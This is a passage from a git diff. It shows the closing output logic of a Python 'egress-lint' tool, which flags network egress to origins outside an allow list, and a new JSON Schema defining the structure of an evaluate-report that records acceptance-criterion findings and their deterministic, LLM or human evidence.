vector(s) to non-allow-listed remote origin(s)." + ) + print(json.dumps({ + "tool": "egress-lint", + "ac": ac, + "clean": clean, + "suggested_status": "conformant" if clean else "non-conformant", + "evidence": {"source": "deterministic", "tool": "egress-lint", "detail": detail, "citations": citations}, + }, indent=2)) + return 0 if clean else 1 + + if not violations: + print("egress-lint: OK") + print(f" scanned {target} (no unsanctioned egress; {len(allow)} allow-listed origin(s))") + return 0 + + print(f"egress-lint: {len(violations)} unsanctioned egress vector(s) found (bears on {ac}):") + for v in sorted(violations, key=lambda v: (v.path, v.line)): + print(f" - {v.path}:{v.line}: [{v.vector}] {v.url}") + print("\nIf an origin above is legitimate for this design's flavor, add it to") + print("egress-allow.json (with a reason naming the axis pick that justifies it).") + return 1 + + +if __name__ == "__main__": + sys.exit(main()) diff --git a/tools/evaluate-report.schema.json b/tools/evaluate-report.schema.json new file mode 100644 index 0000000..a3f25ad --- /dev/null +++ b/tools/evaluate-report.schema.json @@ -0,0 +1,172 @@ +{ + "$schema": "https://json-schema.org/draft/2020-12/schema", + "$id": "https://pna-spec.example/v0.1/evaluate-report.schema.json", + "title": "PNT evaluate-report artifact", + "description": "Machine-comparable form of the report produced by the skill's evaluate flow (pna-build-eval-contrib/SKILL.md § Evaluate flow). Keyed by AC ID so two runs on the same candidate can be diffed to show exactly which ACs changed status. The human-readable report is a rendering (a view) over an instance of this schema; this artifact is the source of truth. This is NOT a PNA interface contract — it realizes no AC and intentionally lives in tools/, not contracts/ (the lint-spec-ids check requires every file in contracts/ to name an AC it realizes; this one realizes none). It is the typed output of PNT's own evaluative tooling. Deterministic checks in tools/ (for example the egress lint) emit evidence entries with source=deterministic that an LLM evaluator folds into the relevant AC finding alongside its own source=llm evidence; source=human covers maintainer or reviewer judgement. Goals 1-5 (see spec/PNA_Spec.md § Goals) are the load-bearing user-facing concerns and drive the summary.", + "type": "object", + "required": ["report_schema_version", "candidate", "summary", "findings"], + "additionalProperties": false, + "properties": { + "report_schema_version": { + "const": "0.1", + "description": "Version of THIS report schema (not the PNA Spec version the candidate was evaluated against — that is candidate.pna_spec_version). Lets a diff tool refuse to compare incompatible report shapes." + }, + "generated_at": { + "type": "string", + "format": "date-time", + "description": "Optional ISO 8601 timestamp the emitter stamps when the report was produced. Informational; not used for diffing." + }, + "generated_by": { + "type": "string", + "description": "Optional free-text identity of the evaluator that produced this report (agent/model/tool). Informational." + }, + "candidate": { + "type": "object", + "description": "What was evaluated. Enough to know which design + revision this report describes, so two reports over the same candidate can be diffed meaningfully.", + "required": ["pna_spec_version", "picks_source"], + "additionalProperties": false, + "properties": { + "name": { "type": "string", "description": "Human-readable design name, if known." }, + "repo_url": { "type": "string", "description": "Canonical source URL, if known." }, + "commit": { "type": "string", "description": "Commit SHA (or other revision id) of the source that was read, if known. Two reports at different commits are expected to differ; two at the same commit should not." }, + "pna_spec_version": { "type": "string", "description": "The PNA Spec version the candidate was evaluated against, e.g. '0.1'." }, + "picks_source": { + "enum": ["declared", "inferred"], + "description": "Whether axis_picks came from the candidate's own Architecture document (declared) or were inferred from the source by the evaluator (inferred). Per SKILL.md § Evaluate flow, both are valid inputs." + }, + "axis_picks": { + "type": "object", + "description": "The candidate's flavor: axis -> pick. Determines which flavor-derived ACs apply (see spec/axes.md). Keys are axis names (e.g. 'distribution', 'storage'); values are pick identifiers (e.g. 'web-bundle-with-magic-link').", + "additionalProperties": { "type": "string" } + } + } + }, + "summary": { + "type": "object", + "description": "Top-of-report posture. Per SKILL.md, anything compromising Goals 1-5 leads here.", + "required": ["posture", "headline"], + "additionalProperties": false, + "properties": { + "posture": { + "enum": ["conformant", "non-conformant", "mixed", "indeterminate"], + "description": "conformant = no non-conformances found and nothing left undetermined. non-conformant = at least one Goal 1-5 AC is non-conformant. mixed = some non-conformances but none on Goals 1-5, or non-conformances coexisting with conformant findings. indeterminate = too many unable-to-determine findings to take a posture." + }, + "headline": { + "type": "string", + "description": "One- or two-sentence prose summary a human reads first. Should name the most concerning non-conformances, Goals 1-5 first." + }, + "leading_concerns": { + "type": "array", + "description": "AC IDs (matching findings[].ac_id) the summary calls out as most concerning, in priority order. Typically the Goal 1-5 non-conformances.", + "items": { "$ref": "#/$defs/ac_id" } + } + } + }, + "findings": { + "type": "array", + "description": "One entry per AC the evaluator considered for the candidate's flavor. The diff signal: same candidate.commit + same report_schema_version should produce the same set of (ac_id -> status); a status change between two runs is the regression/improvement signal.", + "minItems": 1, + "items": { "$ref": "#/$defs/finding" } + } + }, + "$defs": { + "ac_id": { + "type": "string", + "pattern": "^AC-[A-Z0-9-]+$", + "description": "Stable AC identifier as defined in spec/PNA_Spec.md or spec/axes.md, e.g. AC-1, AC-MCP-A, AC-PRM-C." + }, + "code_location": { + "type": "object", + "required": ["path"], + "additionalProperties": false, + "properties": { + "path": { "type": "string", "description": "Repo-relative path to the cited source file." }, + "lines": { "type": "string", "description": "Optional line or range within the file, e.g. '120' or '120-145'." }, + "note": { "type": "string", "description": "Optional one-line explanation of what this location shows." } + } + }, + "evidence": { + "type": "object", + "description": "A single piece of support for a finding's status. The layering principle (deterministic + LLM + human) shows up here as the source field.", + "required": ["source", "detail"], + "additionalProperties": false, + "properties": { + "source": { + "enum": ["deterministic", "llm", "human"], + "description": "deterministic = produced by a tools/ check (e.g. the egress lint); llm = the evaluating model's own architectural reading; human = maintainer/reviewer judgement." + }, + "tool": { + "type": "string", + "description": "For source=deterministic, the producing tool's identifier, e.g. 'egress-lint'. Omitted for llm/human." + }, + "detail": { "type": "string", "description": "What this evidence shows, in prose." }, + "citations": { + "type": "array", + "description": "Optional code locations this specific evidence points at (e.g. the offending call site a deterministic check flagged).", + "items": { "$ref": "#/$defs/code_location" } + } + } + }, + "finding": { + "type": "object", + "required": ["ac_id", "status"], + "additionalProperties": false, + "properties": { + "ac_id": { "$ref": "#/$defs/ac_id" }, + "ac_source": { + "enum": ["universal", "flavor-derived"], + "description": "Where the AC is defined: universal (spec/PNA_Spec.md) or flavor-derived (spec/axes.md, triggered by an axis pick)." + }, + "status": { + "enum": ["conformant", "non-conformant", "not-applicable", "unable-to-determine"], + "description": "Per SKILL.md § Evaluate flow. conformant: design honors the AC. non-conformant: design violates it. not-applicable: the candidate's flavor doesn't trigger this AC. unable-to-determine: evaluator couldn't decide; flags for human review." + }, + "goals": { + "type": "array", + "description": "Which top-level Goals (1-5) this AC bears on. Used to compute summary.posture and order leading_concerns.", + "items": { "type": "integer", "minimum": 1, "maximum": 5 } + }, + "requirement": { + "type": "string", + "description": "The AC's stated normative requirement (the MUST/SHOULD text it constrains). Required when status=non-conformant so the violation is self-explaining." + }, + "rationale": { + "type": "string", + "description": "The evaluator's reasoning. Required for not-applicable (the reason it doesn't apply) and unable-to-determine (what blocked a decision)." + }, + "citations": { + "type": "array", + "description": "Code locations supporting the status. Required (non-empty) for conformant and non-conformant.", + "items": { "$ref": "#/$defs/code_location" } + }, + "evidence": { + "type": "array", + "description": "Supporting evidence entries (deterministic / llm / human). A deterministic tool's output lands here so deterministic and LLM layers co-locate on one AC.", + "items": { "$ref": "#/$defs/evidence" } + }, + "needs_human_review": { + "type": "boolean", + "description": "Defaults true semantically for unable-to-determine. Set explicitly when a conformant/non-conformant call still wants a human second look." + } + }, + "allOf": [ + { + "if": { "properties": { "status": { "const": "conformant" } } }, + "then": { "required": ["citations"], "properties": { "citations": { "minItems": 1 } } } + }, + { + "if": { "properties": { "status": { "const": "non-conformant" } } }, + "then": { "required": ["citations", "requirement"], "properties": { "citations": { "minItems": 1 } } } + }, + { + "if": { "properties": { "status": { "const": "not-applicable" } } }, + "then": { "required": ["rationale"] } + }, + { + "if": { "properties": { "status": { "const": "unable-to-determine" } } }, + "then": { "required": ["rationale"] } + } + ] + } + } +}